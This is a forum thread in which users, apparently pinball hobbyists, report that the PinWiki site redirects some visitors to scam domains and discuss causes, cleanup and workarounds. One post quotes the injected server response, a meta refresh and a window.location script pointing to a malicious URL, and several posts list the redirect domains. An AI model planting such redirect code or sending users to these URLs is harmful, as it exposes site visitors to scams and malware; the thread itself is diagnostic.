For what it’s worth you may well have already fixed it as I haven’t been able to reproduce it again with several browsers. I also ran it through some malware scanners too without problems.

It could of course be dormant at the moment, the base64 point mentioned above is a good one. If it were me I’d be upgrading the wiki software to latest and running a file contents comparison against a known good directory tree.

Ooh, good find!

Sorry, sorry, I wasn't paying attention to the right post. Sorry.

I think it may be squashed. No redirects here and I always get them.

I *think* we have this squashed. Took a LOT of time reviewing files to make sure nothing was left over malicious. I can't find anything else lingering, and can't cause it to happen anymore. If anyone has it happen again, let me know immediately. Beefed up some security items while I was at it. Things seem to be back on track and running smooth. Appreciate the help from all. Especially on this one, as like I've said I struggled to replicate the problem for some reason on my daily setup, so getting detailed info from some of you guys helped me to SEE the problem.

I just got hit. Safari. iphone SE

everytime I go to this
pinwiki.com › wiki › title=Bally › Stern_Electronics_Repair_Guides
it takes me to this
http://app6861.smmhck52.live/?utm_campaign=bKMuT7EMVXU5Z6UvvSHONGlfu-yV43iC8T8uYixAFxs1&t=main9_3c0f4108fe6b08fd&f=1

I have to left click on the arrow to go to cached to open.
been doing it for the past few days that I know about. most other pages seem fine, its just the bally/stern part.

I am being redirected on mobile only right now.

Desktop (windows 10, Chrome browser) is going straight to the wiki if I use pinwiki.com or www.pinwiki.com

Mobile (android 9, Chrome browser is being redirected to the: http://app6861.smmhck52.live link. It is redirecting both www.pinwiki.com and pinwiki.com

Yep, it was fixed for a bit, but now I'm getting redirected again

Pinwiki.com Works for me, iPad using safari.

Im running OSX 10.13.6, and it appears to be working ok in Safari, but when I try to open the site in Firefox, I am getting re-directed. This is even after I have cleared my cashe.

Windows 10, Firefox latest, redirected to a scam site :-/
But it works fine with IE11.

Same... I was ok, until I clicked https://www.pinwiki.com/wiki/index.php?title=Bally/Stern while navigating from the main page...

Looking at the payload... this is certainly all server side. My clean HTTP GET to GET /wiki/index.php?title=Bally/Stern HTTP/1.1

returned a body with

<META http-equiv="refresh" content="1;URL=http://apps4509.nonamesrv97.live/?utm_campaign=bKMuT7EMVXU5Z6UvvSHONGlfu-yV43iC8T8uYixAFxs1&t=main9_3c0f4108fe6b08fd">
<script>
window.location = "http://apps4509.nonamesrv97.live/?utm_campaign=bKMuT7EMVXU5Z6UvvSHONGlfu-yV43iC8T8uYixAFxs1&t=main9_3c0f4108fe6b08fd";
</script>
</head>

So it has to be something in the server or php code. There isn't any malicious js being fed to the client to change the requests/etc.

Just got malware on mobile.

Let me know if you need a hand fixing it. I do this stuff for a living.

I sent him a PM yesterday offering my help as well but I haven't heard back yet. While I don't specifically do malware remediation I am a DevOps/Systems Enginner (yes I know devops isn't really a job title but the industry has decided otherwise)

yep, pinwiki is still down.

Yup I just hit it going to the homepage.

Yeah the infection is back full blown. I couldn't even load the page I was going to. Just forwarded me every time. I couldn't see anything in the console in chrome on where the forward was happening. I'm not very familiar with that console though. I'll poke around with some more advanced tools today.

Request:


GET /wiki/index.php?title=Williams_System_9_-_11 HTTP/1.1

Host: www.pinwiki.com
Connection: close
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Still happening. Is anyone working to resolve this?

I just clicked on a link that appeared for the system 11 page in google, and got redirected.

Won’t go to pinwiki anymore as I always get redirected.

On one of my computers I'm logged in, and I can get to Pinwiki. If not logged in, I can't get there.

You can do a Google search and look at cached pages. The Wayback Machine (archive.org) probably also works, haven't checked though.

I hope Casey is working on this. As of now the site is pretty much worthless.

Edit: You can also get to the site if you block scripting.

Is there anything we can do to pitch in and help clean this up?

Multiple people have offered their assistance, myself included. That was over a week ago. I never heard back. He hasn't even shown up in the thread to acknowledge he's aware and working on it.

For those of you trying to visit the site but still having problems: I've been viewing the pages I need using the Internet Archive Wayback Machine and then saving them as PDFs to my computer.

Sorry, last 2 weeks I've had multiple personal emergencies come up, that have pulled me away from both PinWiki work as well as even making it on here to let you all know. Site is expected to be 100% inaccessible at some point this week as I seem to have found root cause of issue, but will require a full shut off of site for a day or two to get it taken care of. I appreciate the help offers (I have had 2 different cyber security/DevOps types offer to help). If I ran into another snafu after this go round, I will be in touch with you guys who offered.

Good luck with the personal stuff. Pinwiki is a great resource for us, but take care of yourself first please!

It appears the "Upload File" link has been removed. It must be temporarily disabled.

Ken, I have uploads temporarily disabled, when I get things ironed out through this week, uploads will go back on. Sorry for the hassle.

I have been adding information to the CAPCOM section today as well as correcting typos. As soon as the upload file feature is restored, I have some pictures to add to the Capcom section.

Nice! I have a Capcom resetting issue that is not documented there yet.

Thanks for your hard work! Pinwiki is a invaluable resource!!

iPhone iOS 13.3

Safari via pin wiki or google redirects for stern/bally link

Chrome works

Which I find odd as chrome on iOS is just a wrapper of safari

I'm getting redirected and multiple pop ups when trying to access some parts of PinWiki.
Samsung S10 using the Samsung browser.

Same. Samsung S10 with chrome

Yeah. Why is it the site is always hacked? Moto z force phone.

How does this happen?

Because Casey doesn’t fully understand what he is doing? He should have reached out for help a long time ago it sounds like from reading this thread.

Bummer! Shame to lose this resource... Again. I better get to the Wayback machine.

The annoying part is not knowing what sort of sh*t these sites have put on my phone.

You can use archive.org’s “the Wayback Machine” to see point-in-time copies of many websites. Here’s a copy from March, which should be far enough back to avoid the cruft:

https://web.archive.org/web/20180126191428/http://www.pinwiki.com/wiki/

... OOooor...
just make sure the UR has "www." in front of the domain name.. I still use the site, just did this past weekend.

Doesn't always work for me

Ooooeeeee?
That's a fine fix as well as the way back machine but we are a couple of farts away from 2020. There is no reason why a website should act like it's 2002.

No offense to anyone especially the owner of the site. I appreciate your work but how can the pinball community help? Is it a problem with the code? Let's redesign the site. I care more about the info then the wiki look.

Is it the fact anyone can edit the site? Let's shut that function down and come up with a submission process.

What is the problem and what radical change needs to be made? Fuck my phone beeping and flashing when I look at the Sys80 info!

I don't think that actually does anything. www or non-www doesn't seem to affect the malicious redirects. It might be based on the browser agent, referral, or cookie data, or some combination thereof.

I suspect there is malicious code embedded in some of the php files. It's a common method of infection and selective redirection so that some visitors get redirected and others do not. It's a way to stay hidden longer.

These infections usually occur when there's a vulnerability in a website. Unfortunately, the wiki had not been updated in a while, so it's likely a malicious actor took advantage of an unpatched vulnerability and used that as a means to embed code into the site.

The site was upgraded, and hopefully would have replaced the infected files, but this appeared not to be the case. So either there's still some infected files that were left in place (sometimes not all files need to be replaced during an upgrade), possibly some malicious code ended up in the database, possibly that malicious database code wrote itself back into the php files, or the site somehow got reinfected by other means.

Without actually getting eyes on the source code or database, all I can do is speculate. It sounds like Casey received a few offers of help with cleaning out the infection--I'm not sure if that went anywhere yet or not since Casey's last post in the thread here.

A wiki is not a look. It's a type of website. It allows others to collaboratively edit the structure and content, and also logs the changes.

Currently, a wiki is the best engine to use when multiple people are editing content on a single website, unlike with a blog where there is basically only one author.

No, only users with user accounts can edit, and those user accounts need to be approved manually.

Sounds like they need to wipe the server and put a fresh wiki on, then import the old pages again or something.

You would still need to go through the database, uploaded files, config files, template files, etc

It's not quite as simple as that if you also want to retain all the data and avoid inadvertently copying over malicious code, which might be what happened during the upgrade.

As I've stated before, looking at the communication between client and server (being a wed devloper (NOT 'designer'), I have the tools), and no matter what page I hit, if the server name is "pinwiki.com", the HTML returns has a meta refresh pointing to a bad URL, and a <script> take with a location.refresh to the malicious URL.

Whereas the "www.pinwiki.com" does not. These are not cached, I'm looking at the raw data transfer using Wireshark.

Honestly, ya'll can do what you want - use the wayback machine, whatever. I've offered help numerous times to them, and never heard back. For when I need it, I just add the 'www'. It's a much easier process for me that going to a DIFFERENT website (archive) and typing in the name of the site.

Shhhh..... Speculation is always better than facts!

For people that are offering to help, go ahead and set up an unofficial mirror. And be sure to strip out the malicious code as you do it.

"You may not, except with express written permission, distribute or commercially exploit the PinWiki.com content. Nor may you transmit it or store it in any other website or other form of electronic retrieval system." (from https://www.pinwiki.com/wiki/index.php?title=PinWiki:Copyrights)